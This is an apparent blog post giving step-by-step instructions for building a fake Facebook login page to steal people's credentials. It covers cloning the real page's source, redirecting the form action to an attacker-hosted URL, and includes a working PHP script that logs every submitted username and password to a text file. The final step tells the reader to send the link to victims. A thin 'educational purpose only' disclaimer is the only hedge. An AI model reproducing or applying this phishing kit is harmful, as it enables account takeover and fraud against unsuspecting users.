Facebook Phishing
CAUTION:
THE BELOW CONTENT IS FOR EDUCATIONAL PURPOSE ONLY.
In phishing basically we create a fake login page and when the victim logins into the fake page we get victims username and password..
So lets get started
1. First of all you need firefox if you dont have firefox its not gonna work ,So get firefox ,Open firefox and search for www.ripway.com and signup for ripway.
2. Now after signing up for ripway, Go to www.facebook.com, then rightclick on facebook login page and click on View source page or Source.
4.Now after copying the script ,Go back to ripway.com and login into your account, Now go to My files and click on Create text file, and Enter the file name as login.php and at the bottom Paste the facebook copied script into the footer
5. Now in this Facebook copied script you need to find the word "action", Hit Ctrl+F for find,and find for the word "action"
6. Now you can see a link right after Action in Double qoutes , That is "https://www.facebook.com/login.php?login_attempt=1" , You need to change this link to "http://h1.ripway.com/your user name/phishing.php?login_attempt=1"
Note - You need to put your ripway username in the link, For example :- If my username is amithacker then i will put "http://h1.ripway.com/amithacker/phishing.php?login_attempt=1" in the link
7. After changing the link click Save, Now create one-more New text file and name the file as PHISHING.PHP and at the bottom use this script, REMEMBER - You need to put your user name in the below link,
<?php
header ('Location: http://h1.ripway.com/your user name/login.php ');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
8. After putting your user name click Save. And now we are ready to test our phishing page,
Go to My files,Below login.php you will see a link, click that link - http://h1.ripway.com/your user name/login.php
9. After clicking that link you will see the facebook login page which is obviously fake, when you will enter your email and password youll see the page will simply reload with no result, But in your ripway account there will be a new file named as usernames.txt and when you will open that file you will see the email and password that you just typed in the facebook fake login page.
10. You can use this link to send them to whomever you want and when the victim will login into the fake page you will see the victims email and password..
0 comments:
Post a Comment